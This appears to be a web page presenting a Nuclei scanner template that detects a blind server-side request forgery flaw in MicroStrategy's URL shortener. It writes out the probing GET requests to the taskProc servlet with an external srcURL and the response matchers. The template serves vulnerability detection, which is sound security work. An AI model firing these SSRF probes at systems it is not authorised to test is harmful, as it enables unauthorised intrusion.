MicroStrategy tinyurl - Server-Side Request Forgery (Blind)

ID: microstrategy-ssrf

Severity: high

Author: organiccrap

Tags: microstrategy,ssrf

Description

Blind server-side (SSRF) request forgery vulnerability on MicroStrategy URL shortener.

YAML Source

id: microstrategy-ssrf

info:
  name: MicroStrategy tinyurl - Server-Side Request Forgery (Blind)
  author: organiccrap
  severity: high
  description: Blind server-side (SSRF) request forgery vulnerability on MicroStrategy URL shortener.
  reference:
    - https://medium.com/@win3zz/how-i-made-31500-by-submitting-a-bug-to-facebook-d31bb046e204
  metadata:
    max-request: 2
  tags: microstrategy,ssrf

http:
  - method: GET
    path:
      - '{{BaseURL}}/servlet/taskProc?taskId=shortURL&taskEnv=xml&taskContentType=xml&srcURL=https://google.com'
      - '{{BaseURL}}/MicroStrategy/servlet/taskProc?taskId=shortURL&taskEnv=xml&taskContentType=xml&srcURL=https://google.com'

    stop-at-first-match: true
    matchers:
      - type: word
        words:
          - taskResponse
          - The source URL is not valid
        condition: and
        part: body
# digest: 490a004630440220476859d834d4bd2835209696f9fd6c31c498b9a7bd9913bfd510dc6494695ddf022032a4f0823e886867e71ddc4e35ebbafa0d07a7648a5d06b2ec459b80dbd6d0c5:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

$ nuclei -u "URL" -t "http/vulnerabilities/other/microstrategy-ssrf.yaml"

View on Github